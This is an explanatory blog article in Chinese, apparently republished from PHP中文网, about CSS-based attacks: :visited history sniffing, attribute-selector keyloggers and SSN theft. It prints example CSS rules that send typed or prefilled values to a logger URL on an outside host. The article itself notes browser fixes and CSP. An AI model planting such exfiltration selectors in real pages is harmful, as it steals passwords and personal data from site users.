CSS安全漏洞

不必惊慌！CSS本身并非主要的重大安全隐患，大多数情况下无需过度担忧。

然而，一些文章会讨论CSS潜在的令人意外甚至担忧的功能。让我们来总结一下：

访问过的链接问题

该问题描述如下：

1. 网站上有一个指向特定页面的链接，例如Tickle Pigs。
2. 你使用:visited样式设置访问过的链接颜色，例如a:visited { color: pink; }，这并非默认的用户代理样式。
3. 你测试该链接的计算样式。
4. 如果颜色为粉色，则表明该用户访问过该页面。
5. 你将此信息报告给某个服务器，并据此进行某些操作（例如提高保险费率）。

你甚至可能完全使用CSS实现此目的，因为:visited样式可能包含background-image: url(/data-logger/tickle.php);，只有访问过该页面的用户才会请求该图片。

不必担心！浏览器已经阻止了这种攻击方式。

键盘记录器

该问题描述如下：

1. 页面上有一个输入框，可能是密码输入框。
2. 你将一个记录脚本作为输入框的背景图片，并添加大量选择器来收集密码信息。

input[value^="a"] { background: url(logger.php?v=a); }

这并不容易实现。输入框的value属性不会因为用户输入而立即改变。但在React等框架中，有时会发生这种情况。因此，理论上，如果将此CSS添加到使用React构建的登录页面，则此CSS键盘记录器可能有效。

但是，在这种情况下，页面上已经执行了JavaScript代码。对于此类攻击，JavaScript比CSS危险得多。JavaScript键盘记录器只需几行代码即可监控按键事件并通过Ajax进行报告。

内容安全策略 (CSP) 可以阻止第三方和XSS注入的内联JavaScript……当然也可以阻止CSS。

数据窃取

该问题描述如下：

1. 如果我能将恶意CSS添加到你已登录的网站页面……
2. 并且该网站显示敏感信息，例如社会安全号码 (SSN)，预先填充在表单中……
3. 我可以用属性选择器来获取它。

input#ssn[value="123-45-6789"] { background: url(https://secret-site.com/logger.php?ssn=123-45-6789); }

通过大量选择器，你可以覆盖所有可能性！

内联样式块问题

我不确定是否应该将此归咎于CSS，但想象一下：

  ... 插入一些用户生成的内容 ...

也许你允许用户自定义一些CSS。这是一个攻击向量，因为他们可以关闭样式标签，打开脚本标签，并编写恶意的JavaScript代码。

肯定还有更多

想到了吗？分享出来吧。

我对CSS安全漏洞的恐惧程度持怀疑态度。我不想过分轻描淡写安全问题（尤其是第三方问题），因为我不是专家，安全至关重要。但与此同时，我从未听说过CSS成为除思想实验之外的任何攻击载体。请教教我！

以上是CSS安全漏洞的详细内容。更多信息请关注PHP中文网其他相关文章！